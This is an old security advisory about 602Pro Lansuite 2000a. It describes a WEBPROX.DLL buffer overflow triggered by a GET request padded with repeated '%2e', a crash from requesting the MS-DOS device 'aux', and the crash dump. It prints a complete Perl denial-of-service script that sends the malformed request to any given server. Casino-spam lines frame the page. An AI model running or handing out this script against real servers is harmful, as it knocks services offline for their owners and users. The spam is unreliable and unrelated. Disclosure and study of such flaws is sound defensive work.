Casinos Not On Gamstop Non Gamstop Casinos Casinos Not On Gamstop Online Casinos UK Non Gamstop Casino
26th Mar 2001 [SBWID-2048]
COMMAND
	    602Pro Lansuite
SYSTEMS AFFECTED
	    602Pro Lansuite 2000a 1.0.34 - prior
PROBLEM
	    'nitr0s' found following.   There are 2  problems, the first  is a
	    buffer  overflow  in  WEBPROX.DLL  and  the  other  in relation to
	    MS-DOS device  files.Credit should  be given  to Peter  Grundl who
	    made nitr0s  think of  trying this  same problem  that he found in
	    Alt-N  Technologies  MDaemon  WebConfiguration  feature which also
	    affects Xitami Webserver 2.4b5 and probably a whole load of  other
	    windows server programs.
	    Connect to the webserver and send the following request:
	
	        GET /%2e%2e%2e%2e.... /HTTP/1.0
	
	    Where %2e is over 157 times
	    The server depending  on how many  times %2e or  [.] is sent  will
	    exit displaying the following error:
	
	        LANSUITE caused an invalid page fault in
	        module WEBPROX.DLL at 015f:008a1326.
	        Registers:
	        EAX=0000000a CS=015f EIP=008a1326
	        EFLGS=00010216
	        EBX=00000008 SS=0167 ESP=05202848
	        EBP=05202848
	        ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
	        EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
	        Bytes at CS:EIP:
	        8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18
	        Stack dump:
	        052029dc 00862e9a 0000000a 334f2b1f 000000fa
	        81623ff0 81648e38 00000008 bff7b317 018d0000
	        00000000 018d1650 018d1650 0520ace7 018d164c
	        052028cc
	
	    The  other  problem  is  requesting  MS-DOS device files, send the
	    following request to the webserver on port 80
	
	        GET /aux
	
	    The code:
	
	    #!/usr/bin/perl
	    #
	    # 602Pro Lansuite 2000a 1.0.34 Denial Of Service
	    #
	    #
	    # Malformed GET request
	    #
	    use Getopt::Std;
	    use Socket;
	    getopts('s:', \%args);
	    if(!defined($args{s})){&usage;}
	    my
	    ($serv,$port,$foo,$number,$data,$buf,$in_addr,$padd
	    r,$proto);
	    $foo = "%2e";
	    $number = "160";
	    $data .= $foo x $number;
	    $serv = $args{s};
	    $port =  80;
	    $buf = "GET /$data /HTTP/1.0\r\n\r\n";
	    $in_addr = (gethostbyname($serv))[4] || die("Error: $!
	    \n");
	    $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!
	    \n");
	    $proto = getprotobyname('tcp') || die("Error: $!\n");
	    socket(S, PF_INET, SOCK_STREAM, $proto) || die
	    ("Error: $!");
	    connect(S, $paddr) ||die ("Error: $!");
	    select(S); $| = 1; select(STDOUT);
	    print S "$buf";
	    print("Data has been successfully sent to $serv\n");
	    sub usage {die("\n\n$0 -s <server>\n\n");}
	
SOLUTION
	    Not sure what build nitr0s tried, but something similar was  found
	    in the past so please take a look at:
	
	        http://oliver.efri.hr/~crv/security/bugs/Others/602lswa.html
	
	    As for second  problem, that one  is OS related.   Filtering could
	    help here anyway.
Internet highlights

Casino Not On Gamstop